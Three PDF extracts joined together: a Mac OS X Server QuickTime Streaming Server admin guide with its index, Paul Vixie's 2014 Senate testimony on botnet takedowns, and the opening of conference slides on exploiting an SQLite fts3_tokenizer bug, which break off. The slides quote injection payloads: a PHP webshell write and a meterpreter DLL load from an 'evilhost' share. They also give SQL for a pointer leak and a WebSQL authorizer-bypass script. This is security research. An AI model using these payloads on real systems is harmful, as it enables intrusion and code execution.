$serveradmin command qtss:command = getConnectedUsers server:movie_folder Default = "/Library/Quick TimeStreaming/Movies/" server:pid_file Default = "/var/run/Quick TimeStreamingServer.pid" server:reliable_udp Default = yes server:reliable_udp_dirs Default = "/" server:run_group_name Default = "qtss" server:run_num_threads Default = 0 server:run_user_name Default = "qtss" web_admin:enabled Default = no web_admin:password Default = "" web_admin:username Default = "" Parameter (qtss:) Description Command (qtss:command=) Description getConnections List current QTSS connections. See “Listing Current Connections” on this page. getHistory View service statistics. See “Viewing QTSS Service Statistics” on page 167. getLogPaths Find the current location of the service logs. See “Viewing Service Logs” on page 168. LL2354.book Page 166 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 167 Viewing QTSS Service Statistics You can use the serveradmin getHistory command to display a log of periodic samples of the number of connections and the data throughput. Samples are taken once each minute. To list samples: $ sudo serveradmin command qtss:command = getHistory qtss:variant = statistic qtss:timeScale = scale Control-D Output qtss:nbSamples = <samples> qtss:samplesArray:_array_index:0:vn = <sample> qtss:samplesArray:_array_index:0:t = <time> qtss:samplesArray:_array_index:1:vn = <sample> qtss:samplesArray:_array_index:1:t = <time> [...] qtss:samplesArray:_array_index:i:vn = <sample> qtss:samplesArray:_array_index:i:t = <time> qtss:vnLegend = "<legend>" qtss:currentServerTime = <servertime> Parameter Description statistic The value you want to display. Valid values: v1 - number of connected users (average during sampling period) v2 - throughput (bytes/sec) scale The length of time in seconds, ending with the current time, for which you want to see samples. For example, to see 30 minutes of data, you would specify qtss:timeScale = 1800. Value displayed by getHistory Description <samples> The total number of samples listed. <legend> A textual description of the selected statistic. "CONNECTIONS" for v1 "THROUGHPUT" for v2 <sample> The numerical value of the sample. For connections (v1), this is integer average number of connections. For throughput, (v2), this is integer bytes per second. <time> The time at which the sample was measured. A standard UNIX time (number of seconds since Sep 1, 1970). Samples are taken every 60 seconds. LL2354.book Page 167 Monday, October 20, 2003 9:47 AM 168 Chapter 15 Working With QuickTime Streaming Server Viewing Service Logs You can use tail or any other file listing tool to view the contents of the QTSS service logs. To view the latest entries in a log: $ tail log-file You can use the serveradmin getLogPaths command to see where the current QTSS error and activity logs are located. To display the log paths: $ sudo serveradmin command qtss:command = getLogPaths Output qtss:accessLog = <access-log> qtss:errorLog = <error-log> Forcing QTSS to Re-Read its Preferences You can force QTSS to re-read its preferences without restarting the server. You must log in as root to perform this task. To force QTSS to re-read its preferences: 1 List the QTSS processes: $ ps -ax | grep QuickTimeStreamingServer You should see a list similar to the following: 949 ?? Ss 0:00.00 /usr/sbin/QuickTimeStreamingServer 950 ?? S 0:00.13 /usr/sbin/QuickTimeStreamingServer 965 std S+ 0:00.00 grep QuickTimeStreamingServer 2 Find the larger of the two process IDs (PIDs) for the QuickTimeStreamingServer processes (in this case 950). 3 Send a HUP signal to this process: $ kill -HUP 950 Value Description <access-log> The location of the QTSS service access log. Default = /Library/QuickTimeStreaming/Logs/ StreamingServer.log <error-log> The location of the QTSS service error log. Default = /Library/QuickTimeStreaming/Logs/ Error.log LL2354.book Page 168 Monday, October 20, 2003 9:47 AM Chapter 15 Working With QuickTime Streaming Server 169 Preparing Older Home Directories for User Streaming If you want to enable QTSS home directory streaming for home directories created using an earlier version of Mac OS X Server (before version 10.3), you need to set up the necessary streaming media folder in each user’s home directory. You can use the createuserstreamingdir tool to set up the needed /Sites/Streaming folder. To set up /Sites/Streaming in older home directories: $ createuserstreamingdir user Parameter Description user The user in whose home directory the /Sites/Streaming folder is created. LL2354.book Page 169 Monday, October 20, 2003 9:47 AM LL2354.book Page 170 Monday, October 20, 2003 9:47 AM 171 Index Index A AFP (Apple Filing Protocol) canceling user disconnect 74 changing service settings 68 checking service status 67 disconnecting users 73 listing connected users 72 sending user message 73 service settings 68 starting service 67 stopping service 67 viewing service logs 76 viewing service settings 67 viewing service statistics 75 AirPort settings 44 Apache web server 124 Apple Filing Protocol. See AFP AppleTalk settings 42 B bless command 30 BootP set server to use 40 C case-sensitive file system 51 certificate file 119–121 certificates, purchasing 121 certtool utility 119, 121 changeip tool 39 command editing shortcuts 14 command not found message 14 command prompt 13 computer name 31, 44 configuration file, server example 22 naming 25 saving 21 connections AFP 72 FTP 80 QTSS 166 SMB 84 CSR (Certificate Signing Request) 119–121 D date 31, 32 delay rebinding options, LDAP 158 DHCP (Dynamic Host Configuration Protocol) adding a subnet 133 changing service settings 130 checking service status 129 service settings 130 set server to use 40 starting service 129 stopping service 129 viewing service logs 134 viewing service settings 129 dial-in service, PPP 153 DirectoryServiceAttributes 155 DirectoryServiceAttributes 155 DirectoryService daemon 155 DirectoryService daemon 155 disk journaling 50 diskspacemonitor command 48 DNS (Domain Name System) changing servers 41 changing service settings 135 checking service status 135 service settings 135 starting service 135 stopping service 135 viewing service logs 135 viewing service settings 135 viewing service statistics 136 Domain Name System. See DNS dscl command 155 dsimportexport command 54–57 dsperfmonitor command 155 Dynamic Host Configuration Protocol. See DHCP E energy saver settings 33 error messages command not found 14 LL2354.book Page 171 Monday, October 20, 2003 9:47 AM 172 Index F file system, case-sensitive 51 File Transfer Protocol. See FTP fingerprint, RSA 17 Firewall service. See IPFilter service fsck command 50 FTP (File Transfer Protocol) changing service settings 78 checking connections 80 checking service status 77 service settings 78 starting service 77 stopping service 77 viewing service logs 80 viewing service settings 77 FTP proxy settings 42 G Gopher proxy settings 43 H home directory, creating 63 host name 45 hup signal 168 I installer command 21 IP address changing server’s address 39 validating 40 IP Failover 150–153 IPFilter service changing settings 137 checking status 137 configuration file 138 defining rules 138 settings 137 starting 136 stopping 136 viewing logs 142 viewing settings 137 ipfw.conf file 138 J journaling 50 K kdcsetup utility 160 Kerberos tools and utilities 160 kerberosautoconfig tool 160 keychain 119 kill command 168 known_hosts file 17 L LDAP (Lightweight Directory Access Protocol) and SASL 157 configuration file 158 delay rebinding options 158 idle timeout parameter 158 ldapsearch tool 157 parameter list 158 rebinding parameter 158 tools and utilities 157 tools for configuring 157 ldapadd tool 157 ldapcompare tool 157 ldapdelete tool 157 ldapmodify tool 157 ldapmodrdn tool 157 ldappasswd tool 157 ldapsearch tool 157 ldapwhoami tool 157 Lightweight Directory Access Protocol. See LDAP log files AFP service 76 DHCP service 134 DNS service 135 FTP service 80 IPFilter service 142 Mail service 118 NAT service 144 Print service 95 QTSS 168 reclaiming space 49 SMB service 87 VPN service 149 Web service 125 login, enabling remote 35 M MAC address 37 Mail service changing settings 104 checking status 103 settings 104 starting 103 stopping 103 viewing logs 118 viewing settings 103 viewing statistics 117 man command 18 man pages, viewing 18 mkpassdb utility 159 mount command 47 N NAT (Network Address Translation) changing service settings 143 LL2354.book Page 172 Monday, October 20, 2003 9:47 AM Index 173 checking service status 142 service settings 143 starting service 142 stopping service 142 viewing service logs 144 viewing service settings 142 NeST tool 159 NetBoot service changing settings 98 checking status 97 filters record array 99 general settings 98 image record array 100 port record array 101 starting 97 stopping 97 storage record array 99 viewing settings 97 NetInfo tools and utilities 159 Network Address Translation. See NAT Network File System. See NFS network interface, settings 37 network port, settings 37 network port configurations 38 network time server 31, 33 NFS (Network File System) changing service settings 77 checking service status 76 starting and stopping service 76 viewing service settings 76 nicl tool 159 nidump tool 159 nifind tool 159 nigrep tool 159 niload tool 159 nireport tool 159 O Open Directory data types 155 LDAP 157 modifying a node 155 NetInfo 159 settings 156 SLP 156 testing configuration 155 testing plugins 155 P password server 159 plugins, Open Directory 155 pmset command 34 Point-to-Point Protocol. See PPP power failure automatic restart 33 power management 34 PPP (Point-to-Point Protocol) enabling dial-in service 153 pppd command 153 pppd command 153 Print service changing settings 90 checking status 89 holding jobs 94 listing jobs 94 listing queues 93 pausing queues 93 queue data array 91 settings 90 starting 89 stopping 89 viewing logs 95 viewing settings 89 prompt 13 proxy settings FTP 42 Gopher 43 SOCKS firewall 44 streaming 43 web 43 ps command listing QTSS processes 168 Q QTSS (QuickTime Streaming Server) changing settings 162 checking status 161 commands for managing 161 listing connections 166 logs 168 settings 163 starting 161 statistics 167 stopping 161 viewing settings 162 QuickTime Streaming Server. See QTSS R rebinding options, LDAP 158 remote login, enabling 35 Rendezvous name 45 restart automatic 33 checking if required 19 server 29 root privileges su command 15 sudo command 15 RSA fingerprint 17 LL2354.book Page 173 Monday, October 20, 2003 9:47 AM 174 Index S SASL used by ldapsearch 157 scripts adding a website 127 Secure Sockets Layer. See SSL serial number, server software 26 serveradmin utility usage notes 19 server configuration file example 22 naming 25 saving 21 Server Message Block. See SMB serversetup utility usage notes 19 Service Location Protocol. See SLP share points creating 66 listing 65 updating SMB service after change 86 sharing command 65, 66 shell prompt 13 shortcuts typing commands 14 shutdown command 30 restarting a server 29 single sign-on 160 slapadd tool 157 slapcat tool 157 slapconfig utility 157 slapindex tool 157 slappasswd tool 157 sleep settings 33 SLP (Service Location Protocol) registering URLs 156 slp_reg command 156 SMB (Server Message Block) changing service settings 81 checking service status 80 disconnecting users 85 listing service users 84 service settings 82 starting service 80 stopping service 80 viewing service logs 87 viewing service settings 81 viewing service statistics 86 SOCKS firewall proxy settings 44 softwareupdate command 26 ssh command 16 SSL 17 SSL (secure Sockets Layer) using with Mail service 119 SSLOptions 17 SSLRequire 17 sso_util utility 160 startup disk 34 statistics AFP 75 DNS 136 Mail service 117 QTSS 167 SMB 86 Web service 126 streaming proxy settings 43 subnet mask validating 40 su command 15 sudo command 15 T tail command viewing AFP service logs 76 viewing DHCP service logs 134 viewing DNS service logs 135 viewing FTP service logs 80 viewing IPFilter service logs 142 viewing Mail service logs 118 viewing NAT service logs 144 viewing Print service logs 95 viewing QTSS service logs 168 viewing SMB service logs 87 viewing VPN service logs 149 viewing Web service logs 125 TCP/IP settings 39, 40 Telnet 18 Terminal using 13 throughput. See statistics time 31, 32 time server 31, 33 time zone 31, 32 U users attributes 57 checking admin privileges 63 checking name, id, or password 62 creating administrators 53 creating home directory 63 importing 54–57 V Virtual Private Network. See VPN volumes, mounting and unmounting 47 VPN (Virtual Private Network) changing service settings 145 checking service status 145 service settings 146 LL2354.book Page 174 Monday, October 20, 2003 9:47 AM Index 175 starting service 145 stopping service 145 viewing service logs 149 viewing service settings 145 W web proxy settings 43 Web service changing settings 124 checking status 123 listing sites 125 script to add site 127 starting 123 stopping 123 viewing logs 125 viewing settings 123 viewing statistics 126 websites script for adding 127 Windows service. See SMB service LL2354.book Page 175 Monday, October 20, 2003 9:47 AM
pdf
Testimony of Paul Vixie, Chairman & CEO Farsight Security, Inc. before the Subcommittee on Crime and Terrorism United States Senate Committee on the Judiciary Hearing on Taking Down Botnets: Public and Private Efforts to Disrupt and Dismantle Cybercriminal Networks July 15, 2014 I. INTRODUCTION Good afternoon Mr. Chairman, Ranking Member Graham, and Members of the Subcommittee. Thank you for inviting me to testify on the subject of botnet takedowns. My name is Paul Vixie, and I am the Chairman and Chief Executive Officer of Farsight Security, a commercial Internet security company. I am speaking today in my personal capacity based on a long history of building and securing Internet infrastructure. I am also here at the behest of the Messaging, Malware and Mobile Anti-Abuse Working Group (M3AAWG), a non-profit Internet security association whose international membership is actively working to improve Internet security conditions worldwide. I have first-hand knowledge of these matters from my experience in the Internet industry since 1988. My background includes serving as the Chief Technology Officer for Abovenet/MFN, an Internet Service Provider (ISP); serving as the founder and CEO of MAPS, the first anti-spam company; and acting as the operator of the “F” DNS root name server. I have also been involved in Internet standards work in the Internet Engineering Task Force (IETF) and policy development work in the Internet Corporation for Assigned Names and Numbers (ICANN). In addition, I served for nine years on the board of trustees of ARIN, a company responsible for allocating Internet address resources in the United States, Canada, and parts of the Caribbean. I presently serve on the ICANN Security and Stability Committee (SSAC) and the ICANN Root Server System Advisory Committee (RSSAC). I am the author of several Internet standards related to the Internet Domain Name System (DNS) and was for eleven years the maintainer of BIND, a popular open source DNS software system. It was for my work on DNS and BIND that I was inducted earlier this year into the Internet Hall of Fame. My remarks today reflect my ongoing goal of fostering improvements in botnet takedown activities by the non- profit, for-profit, and law enforcement sectors. II. LESSONS FROM CONFICKER AND GHOST CLICK I would like to start by reviewing several successful botnet takedown efforts in recent years, since commonalities among these successes may prove instructive. In 2008 the Conficker worm was discovered and by mid-2009 there were over ten million infected computers participating in this botnet. I had a hands-on-keyboard role in operating the data collection and measurement infrastructure for the takedown team1, in which competing commercial security companies and Internet Service Providers – most being members of M3AAWG – cooperated with each other and with the academic research and law enforcement communities to mitigate this global threat.2 In 2011 the US Department of Justice led “Operation Ghost Click” in which a criminal gang headquartered in Estonia was arrested and charged with wire fraud, computer intrusion, and conspiracy. The “DNS Changer” botnet included at least 600,000 infected computers and the mitigation task was complicated by the need to keep all of these victims online while shutting off the criminal infrastructure the victims at this point depended on3. My employer, Internet Systems Consortium (ISC), was the court appointed receiver for the criminal’s Internet connectivity and resources, and I personally prepared, installed, and operated the replacement DNS servers necessary for this takedown. Each of these examples shows an ad-hoc public/private partnership in which trust was established and sensitive information including strategic planning was shared without any contractual framework. These takedowns were so-called “handshake deals” where personal credibility, not corporate or government heft, was the glue that held it together and made it work. And in each case the trust relationships we had formed as members of M3AAWG were key enablers for rapid and coherent reaction. Each of these takedowns is also an example of modern multilateralism in which intent, competence, and merit were the guiding lights. The importance of multilateralism cannot be overemphasized: We have found that when a single company or a single agency or nation “goes it alone” in a takedown action, the result has usually been catastrophe. The Internet is hugely interdependent and many rules governing its operation are unwritten. No amount of investment or planning can guarantee good results from a unilateral takedown action. Rather, takedown actors must work in concert and cooperation with a like-minded team representing many crafts and perspectives, in order to maximize benefit and minimize cost – and I refer specifically to the collateral costs borne by uninvolved bystanders. For example, Conficker’s second major version generated 50,000 (fifty thousand) domain names per day that had to be laboriously blocked or registered in order to keep the control of this botnet out of the hands of its criminal authors. Complicating the situation, these 50,000 domain names were split up across 110 different “country code” top-level domains that are each the property of a sovereign nation. The registries for these domains are a mix of private and public institutions, some with national government oversight and many without. Almost all of the 110 registries agreed to cooperate, which involved sharing technical plans and data, as well as strategic plans and calendars. Similarly, Operation Ghost Click required cooperation between United States and Estonian national law enforcement agencies, as well as competing national and multi- national ISPs and Internet security companies, and an eclectic collection of Internet researchers and adventurers. This diverse team worked together for a single common cause which was to protect the Internet’s end users and restore the Internet’s infrastructure after an extraordinary breach. Privacy deserves a special mention. In any takedown of criminal infrastructure, it is vital that end user privacy be protected according to the greatest common denominator of the laws or rules governing each participant in the coordinated takedown effort. So it was in Conficker, where victim event data that showed time stamps and unique IP addresses were only made available on a trusted, need-to-know basis. This information was only shared either with responsible scientists for studies conforming to international ethical guidelines for human subjects research, or with ISPs and anti-virus companies for the narrow and specific purpose of identifying and notifying victims with the end goals of cleanup and remediation. Privacy protections during Operation Ghost Click were even more rigorous. The court- appointed receiver who operated the replacement DNS servers deliberately gathered the minimum possible data about each victim, which included the IP address, time stamp, and port number – but no end-user DNS lookup names. Furthermore, the FBI and DOJ team members declared themselves unwilling to hold or even receive victim specific data, so the court-appointed receiver delivered the victim records directly to the researcher and clean-up teams, subject to non-disclosure terms. The ad-hoc nature of these public/private partnerships may seem like cause for concern, but I hope you will consider the following: First, this is how the Internet was built and how the Internet works; second, this is how criminals work with other criminals. We would not get far by trying to solve these fast-evolving global problems with top-down control or through government directives and rules. Bot-masters are constantly innovating, both by devising new ways to penetrate networks and new methods of avoiding detection. Effective response to, and remediation of, botnet attacks requires a coordinated effort that is flexible, nimble, and capable of quickly identifying and adapting to a dynamic and changing threat landscape. While government has a role to play in the takedown of criminal infrastructure such as botnets, it can be most effective by continuing to support the participation in ad-hoc public/private partnerships by agencies such as Justice (for example, see the FBI’s involvement in the National Cyber- Forensics and Training Alliance [NCFTA]) and Homeland Security (for example, see the United States Computer Emergency Readiness Team [US-CERT] and the SEI/CMU CERT). As another takeaway, I note that these two successful takedown exercises were both zero- fee events – no one was asked to “pay to play.” The shared goal of protecting Internet end users and restoring the Internet’s infrastructure requires a perfectly level playing field, and the only money which changed hands in Operation Ghost Click was a modest contract for technical services between the DOJ and the court-appointed receiver. III. EFFECTIVE ACTION REQUIRES UNDERSTANDING HOW BOTNETS ORIGINATE AND PROLIFERATE I’d like to take a moment to explain where botnets come from and what makes them so attractive to criminals and also what makes them possible. A botnet is literally a “network of robots,” where by “robot” we mean a computer that has been captured and made to run software neither provided by the computer’s maker nor authorized or installed by its owner. The Internet now reaches billions of end users, as well as tens of millions of unattended “servers” including alarming growing number of industrial control systems. Every Internet-connected device has some very complex software including an operating system, installed applications, and ephemeral “plugins.” The only hard and fast requirement for any of this software is “interoperability,” meaning, it merely has to work. From its humble academic origins in 1969 to the present planetary-scale digital fabric interconnecting most humans and facilitating almost all commerce, the Internet has seen continuous wildcat growth. As a platform for innovation, the Internet is unequaled in all of human history for the value it has created and the tools it has made available to every person in every nation. The level of freedom allowed to innovators on the Internet is unprecedented – pretty much any smart person or team can try out almost any idea, with a built-in global audience and perhaps an immediate global market as well. The invisible cost of this growth and innovative value creation is that much of the software we run on many of our connected devices was given wide exposure and perhaps forgotten by its maker without receiving “red team” testing to check for vulnerabilities. The challenge for the Internet is that today there is perhaps more assurance that a U.L. Listed toaster oven will not burn our house down than there is that some of our vastly more expensive and powerful Internet-connected devices are insulated from becoming a tool of online criminals. The economics of this situation also can be challenging, since in the fast-changing, high- growth Internet-enabled economy the winners are characterized by short time to market, low cost, and high volume. Innovators may not always have the time or resources to address potential security issues, so we live in a culture of “patching it later.” During the preparation of these remarks, I read news reports of an Internet-enabled light bulb, part of the “Internet of things,” that was found to be vulnerable to a simple attack in which it would expose the local wireless network password to anyone who asked. It is extremely unlikely that any of these flawed light bulbs can be patched or that their owners can or will be informed of the need to return the product for a refund or exchange. So while the world needs the Internet and the Internet’s powers of economic growth and innovation, the cost to the world is that many tens of millions of connected devices can easily and quite often do become tools for criminals. Some companies know this and are addressing it, but much work remains. But the pace of innovation and adaptation on the Internet is being matched by the pace of innovation and adaptation by criminal bot masters. After a software flaw leading to vulnerability is found and circulated, it is quickly exploited for criminal purposes. The first step is to use the flaw to install software used by criminals to manage the new computer as part of a botnet. Later steps will be to install specific software tools to facilitate various kinds of online crime like DDoS attacks, spamming, key logging, credential theft, or identity theft. The most important role of every member of a botnet is: find and infect more victims. Thus virtually all software flaws are exercised indirectly, using other infected computers. Criminals can operate their infrastructure through so many layers of proxies and middle-men that it’s almost impossible to trace most criminal acts back to their actors. As corollaries, it’s safe to say two things: (1) Most Internet crime could not exist without botnets; and (2) Botnets could not exist absent a never- ending series of software flaws in Internet connected devices. This is not a call for regulatory relief. The Internet’s success has come organically; that is, not just without a plan but precisely because there was no plan. No national government or super-national governance body could, or should try to, put this genie into a bottle. Rather, we must take stock of some long-invisible costs and make informed decisions as a nation and as a society on which of the Internet’s costs we should just live with versus which costs are high enough that we should seek out cheaper alternatives. The primary ways to lower these costs are no different than any non-Internet field: (1) Understand our situation; (2) Make our choices with eyes wide open; and (3) Invest or front-load wherever it will reduce costs in the long run. Finally, I’d like to quote an ICANN Security and Stability Advisory Committee (SSAC) report from 2002: With the advent of high speed "always on" connections, these PCs add up to either an enormous global threat, or a bonanza of freely retargetable resources, depending upon one's point of view.4 Regrettably, the major trend in the twelve years since that report was written is growth – more Internet connected devices, more software flaws, more botnets, and more crime. IV. STEPS FOR THE FUTURE Next, I’d like to describe what I think are some practical and effective next steps we can take toward some short and medium term goals. As you’ll see, I believe that we can get the most traction by going after the causes, enablers, and attractions of botnets, rather than just beefing up our ability to take down botnets. Awareness campaigns have played a notable role in slowing the spread of human diseases such as tuberculosis and HIV. Given the danger that an unpatched and undefended Internet connected device can pose to the world’s economy as well as to the privacy and safety of its owner and other humans, why would we do less to stop the spread of botnets? I hope to see the day when every user of the Internet knows that if their device is out of date and terribly slow, it is probably infected with malicious software that makes the device steal their identity, send spam, and participate in DDoS attacks. The US Government is one of the world’s largest buyers of Information Technology (IT). Any technical requirement that becomes part of the Federal Information Processing Standards (FIPS) stands a good chance of becoming a de-facto standard for the world. Since DDoS attacks often rely on the lack of Source Address Validation (SAV) by an ISP, perhaps we should investigate requiring SAV by date-certain for all ISPs and hosting or cloud service providers who wish to sell services to the US Government. Ensuring the security of critical infrastructure is a high priority for both government and industry. It may be useful to explore empaneling a blue ribbon committee to identify and recommend best practices for securing network and server architecture operating industrial control systems, especially as it relates to connected devices, connections between the hot side and the outside, and software testing and patching protocols for those systems. Some of the Conficker-infected computers we tracked in 2008 and 2009 turned out to be industrial controllers for medical equipment including in some cases human life/safety monitors used in surgical operating theatres. While there may be some subtleties involved in getting these embedded computers patched without triggering full recertification, there’s no question that these computers should not be connected to the open Internet, or that the staff’s first clue that they have a problem should not be a phone call from the Conficker Working Group. We are now a connected society, and we need to find more ways to front-load security protections into Internet-connected services and offerings. To this end, government should continue to support and encourage industry-led groups like M3AAWG – which has been active in publishing reports and developing voluntary practices aimed at strengthening and facilitating botnet detection and remediation – and public/private partnerships like NCFTA. V. CONCLUSION I’ve given a very brief overview of the botnet problem, its causes, its impact, and its likely future assuming we allow nature to take its course. I’d like to leave you with the following thoughts: 1. The Internet is the greatest invention in recorded history, in terms of its positive impact on human health, education, freedom, and on every national economy. 2. We have necessarily cut some corners on device and software safety and quality in order to innovate at breakneck speed from 1969 to now – time-to-market, not resistance to takeover, has often been our overriding engineering principle. 3. The Internet is also therefore the greatest invention in recorded history in terms of its negative impact on human privacy and freedom, as evidenced by the massive and continuing illicit transfer of wealth from productive people and countries toward unproductive people and countries. 4. Our democratic commitment to the rule of law has very little traction on the Internet compared to how the rule of law works in the real world. The Internet is borderless and lawless, but carries more of the world’s commerce every year. 5. These problems manifest as “botnets” which are networks of robots, where the robots in question are using our connected devices in ways we never agreed to. 6. Takedown of criminal infrastructure including “botnets” must be approached not just as reactions after the fact but also as prevention by attacking the underlying causes. 7. Takedown is no single agency’s or any single company’s job, and unilateralism never ends well in any case – so, cooperation and multilateralism must be our guiding lights. 8. The US Department of Justice is the envy of the world in its approach to takedown and its awareness of the technical and social subtleties involved, with a special shout-out to NCFTA, a public/private partnership with strong FBI ties. 9. No legislative or regulatory relief is sought in these remarks – the manner in which government and industry have coordinated and cooperated on botnet takedown efforts have underscored the effectiveness of public/private partnerships that afford all affected parties the necessary degree of flexibility and adaptability to face and eliminate botnet threats. Mr. Chairman, Ranking Member Graham and Members of the subcommittee, this concludes my written statement. Thank you again for this opportunity to speak before you today on this important topic, and I would be happy to answer your questions. 1 Conficker Working Group, http://confickerworkinggroup.org/wiki/ 2 Worm: The First Digital World War, Mark Bowden, 2011, ASIN B005IGBHU8 3 DNS Changer Working Group, http://www.dcwg.org/ 4 Securing the Edge, Paul Vixie, 2002, https://archive.icann.org/en/committees/security/sac004.txt
pdf
Many Birds, One Stone: Exploiting a Single SQLite Vulnerability Across Multiple Software Kun Yang(@KelwinYang) About us ● Beijing Chaitin Tech Co., Ltd(@ChaitinTech) ○ https://chaitin.cn/en ○ pentesting services and enterprise products ● Chaitin Security Research Lab ○ Pwn2Own 2017 3rd place ○ GeekPwn 2015/2016 awardees: PS4 Jailbreak, Android rooting ○ CTF players from team b1o0p, 2nd place at DEF CON CTF 2016 ● Acknowledgement ○ Siji Feng(a.k.a slipper) ○ Zhi Zhou(@CodeColorist) 2 SQLite “SQLite is a self-contained, high-reliability, embedded, full-featured, public-domain, SQL database engine. SQLite is the most used database engine in the world.” ● Storage backend for web browsers ● Programming language binding ● Web database ● Embedded database for mobile apps ● Database on IOT devices 3 Known Attacks on SQLite SQLite3 Injection Cheat Sheet ● Attach Database ○ ?id=bob'; ATTACH DATABASE '/var/www/lol.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('<? system($_GET['cmd']); ?>';-- ● SELECT load_extension() ○ ?name=123 UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- 4 Memory Corruption SQLite database: file format with inevitable memory corruption bugs ● CVE-2015-7036 ○ Parsing a malformed database file will cause a heap overflow of several bytes in the function sqlite3VdbeExec() ● CVE-2017-10989 ○ mishandles undersized RTree blobs in a crafted database, leading to a heap-based buffer over-read 5 Memory Corruption SQLite interpreter: more flexible ways to trigger bugs in sql statements ● CVE-2015-3414 ○ SQLite before 3.8.9 does not properly implement the dequoting of collation-sequence names, as demonstrated by COLLATE"""""""" at the end of a SELECT statement. ● CVE-2015-3415 ○ The sqlite3VdbeExec function in vdbe.c in SQLite before 3.8.9 does not properly implement comparison operators, as demonstrated by CHECK(0&O>O) in a CREATE TABLE statement. 6 Fuzzing SQLite Previous work of Michał Zalewski: AFL: Finding bugs in SQLite, the easy way ● Uninitialized pointers, bogus calls to free(), heap/stack buffer overflows ● 22 crashes in 30 min ● Now AFL is a standard part of SQLite testing strategy Example from his work sqlite-bad-free.sql (CVE-2015-3415) create table t0(o CHar(0)CHECK(0&O>O)); insert into t0; select randomblob(0)-trim(0); 7 AFL is not everything, we want deeper vulnerabilities. 8 Data Types in SQLite Every value in SQLite has one of five fundamental data types: ● 64-bit signed integer ● 64-bit IEEE floating point number ● string ● BLOB ● NULL 9 Virtual Table Mechanism ● A virtual table is an object that is registered with an open SQLite database connection. ● Queries and updates on a virtual table invoke callback methods of the virtual table object. ● It can be used for ○ representing in-memory data structures ○ representing a view of data on disk that is not in the SQLite format ○ computing the content for application on demand 10 Complicated Extensions Many features are introduced to SQLite as extensions ● Json1 - JSON Integration ● FTS5/FTS3 - Full Text Search ● R-Tree Module ● Sessions ● Run-Time Loadable Extensions ● Dbstat Virtual Table ● Csv Virtual Table ● Carray ● Generate_series ● Spellfix1 11 Complex Features vs Simple Type System Some extensions require complex data structures Internal data is stored in special tables of the same database This data can only be stored as BLOB type ● How can we know the original type of a BLOB? ● Should we trust the stored BLOB in database? 12 Answers from SQLite source code How can we know the original type of a BLOB? ● We can infer the type from the column name or function argument name Should we trust the stored BLOB in database? ● Why not? 13 Case Study: CVE-2015-7036 FTS3 and FTS4 are SQLite virtual table modules that allow users to perform full-text searches on a set of documents. They allow users to create special tables with a built-in full-text index. An FTS tokenizer is a set of rules for extracting terms from a document or basic FTS full-text query. In addition to providing built-in "simple" and other tokenizers, FTS provides an interface for applications to implement and register custom tokenizers written in C. 14 Case Study: CVE-2015-7036 FTS does not expose a C-function that users call to register new tokenizer types with a database handle. Instead, the pointer must be encoded as an SQL blob value and passed to FTS through the SQL engine by evaluating a special scalar function. ● SELECT fts3_tokenizer(<tokenizer-name>); ● SELECT fts3_tokenizer(<tokenizer-name>, <sqlite3_tokenizer_module ptr>); 15 Passing and dereferencing pointer in SQL queries? Case Study: CVE-2015-7036 SQLite version 3.14.0 2016-07-26 15:17:14 Enter ".help" for usage hints. Connected to a transient in-memory database. Use ".open FILENAME" to reopen on a persistent database. sqlite> select hex(fts3_tokenizer('simple')); 60DDBEE2FF7F0000 sqlite> select fts3_tokenizer('mytokenizer', x'4141414142424242'); AAAABBBB sqlite> select hex(fts3_tokenizer('mytokenizer')); 4141414142424242 16 Case Study: CVE-2015-7036 Info leak ● fts3_tokenizer returns the address of registered tokenizer as a BLOB, querying the built-in tokenizers can leak the base address of sqlite module. Untrusted pointer dereference ● fts3_tokenizer believes the second argument is always a valid pointer to a sqlite3_tokenizer_module, and it can never know the real type of the argument 17 The first easily exploitable sqlite memory corruption bug, and can be exploited through browsers! 18 Web SQL Database WebDatabase defines an API for storing data in databases that can be queried using a variant of SQL. All the browser that implement this API use SQLite3 as a backend. W3C has ceased maintaining the specification of WebDatabase, but it still remains available on latest Webkit (Safari) and Blink (Chromium). 19 Beware. This specification is no longer in active maintenance and the Web Applications Working Group does not intend to maintain it further. Web SQL Database var db = openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024); db.transaction(function(tx) { tx.executeSql('CREATE TABLE IF NOT EXISTS LOGS (id unique, log)'); tx.executeSql('INSERT INTO LOGS (id, log) VALUES (1, "foobar")'); tx.executeSql('INSERT INTO LOGS (id, log) VALUES (2, "logmsg")'); }); db.transaction(function(tx) { tx.executeSql('SELECT * FROM LOGS', [], function(tx, results) { var len = results.rows.length, i; for (i = 0; i < len; i++) { document.write("<p>" + results.rows.item(i).log + "</p>"); } }, null); }); 20 Open a database Enter a transaction Prepare tables Execute and read from a query Read column SQLite in browser is filtered The sqlite3_set_authorizer() interface registers a callback function that is invoked to authorize certain SQL statement actions. void SQLiteDatabase::enableAuthorizer(bool enable) { if (m_authorizer && enable) sqlite3_set_authorizer(m_db, SQLiteDatabase::authorizerFunction, m_authorizer.get()); 21 Database Authorizer FTS3 is the only allowed virtual table: int DatabaseAuthorizer::createVTable(const String& tableName, const String& moduleName) { ... // Allow only the FTS3 extension if (!equalLettersIgnoringASCIICase(moduleName, "fts3")) return SQLAuthDeny; 22 Database Authorizer Functions are whitelisted int DatabaseAuthorizer::allowFunction(const String& functionName) { if (m_securityEnabled && !m_whitelistedFunctions.contains(functionName)) return SQLAuthDeny; return SQLAuthAllow; } An authorizer bypass is needed to use fts3_tokenizer: CVE-2015-3659 (ZDI-15-291) 23 CVE-2015-3659 Authorizer whitelist bypass We can create a table that will execute privileged functions, by specifying a DEFAULT value for a column and then inserting into the table. var db = openDatabase('mydb', '1.0', 'Test DB', 2 * 1024 * 1024); var sql = "hex(fts3_tokenizer('simple'))"; db.transaction(function (tx) { tx.executeSql('DROP TABLE IF EXISTS BAD;') tx.executeSql('CREATE TABLE BAD (id, x DEFAULT(' + sql + '));'); tx.executeSql('INSERT INTO BAD (id) VALUES (1);'); tx.executeSql('SELECT x FROM BAD LIMIT 1;', [], function (tx, results) { var val = results.rows.item(0).x; }); }, function(err) { log(err.message) }); 24 bypass fts3_tokenizer code execution in PHP ● Administrators usually set disable_functions to restrict the abilities of webshells disable_functions=exec,passthru,shell_exec,system,proc_open,popen,... ● PHP is not really sandboxed, all restrictions can be bypassed through native code execution 25 fts3_tokenizer code execution in PHP ● LAMP stack loads 